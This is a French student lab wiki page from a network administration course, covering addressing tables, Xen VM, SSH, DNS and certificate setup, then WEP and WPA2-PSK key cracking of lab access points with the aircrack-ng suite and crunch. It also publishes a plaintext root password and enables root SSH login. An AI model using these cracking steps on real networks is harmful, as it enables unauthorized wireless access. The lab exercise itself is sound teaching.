| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   193.48.57.0/24 ;&lt;br /&gt;
 };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Wiki_intrusion_5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
